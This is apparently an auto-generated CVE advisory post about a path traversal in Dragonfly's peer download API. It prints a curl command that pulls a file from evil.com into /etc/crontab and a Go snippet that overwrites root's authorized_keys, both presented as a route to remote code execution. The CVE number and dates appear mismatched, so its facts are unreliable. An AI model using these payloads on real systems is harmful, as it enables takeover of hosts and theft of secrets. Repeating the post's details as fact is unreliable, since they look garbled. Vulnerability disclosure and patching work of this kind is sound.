Dragonfly, Path Traversal, CVE-2020-35527 (Critical)

Listen to this Post

The vulnerability exists in the file handling mechanisms of the Dragonfly peer’s gRPC and HTTP APIs. A malicious peer can craft requests containing path traversal sequences (e.g., ../../) within the `DataFilePath` parameter or similar fields. The vulnerable code, specifically the `os.OpenFile(t.DataFilePath, …)` call, does not sanitize the input path. This allows an attacker to break out of the intended data directory. The subsequent `file.Seek` and `io.Copy` operations then read or write data to an arbitrary, attacker-specified location on the filesystem, leading to arbitrary file read and write primitives.
Platform: Dragonfly
Version: <2.1.0
Vulnerability: Path Traversal
Severity: Critical

date: 2020-12-16

Prediction: 2020-12-10

What Undercode Say:

curl -X POST http://victim-peer:port/api/download -H "Content-Type: application/json" -d '{"url":"http://evil.com/malicious.iso","dataFilePath":"../../../../etc/crontab"}'
// Proof-of-Concept code snippet exploiting the file write
req := &dfdaemon.DownloadRequest{
Url: "http://example.com",
DataFilePath: "../../../root/.ssh/authorized_keys", // Traversal to critical location
// ... other fields
}
client.Download(context.Background(), req)

How Exploit:

Craft API requests with path traversal sequences in `DataFilePath` parameter to overwrite or read sensitive system files, such as SSH keys or cron jobs, for remote code execution.

Protection from this CVE:

Upgrade to v2.1.0.

Impact:

Arbitrary File Read/Write, Remote Code Execution, Secret Theft.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top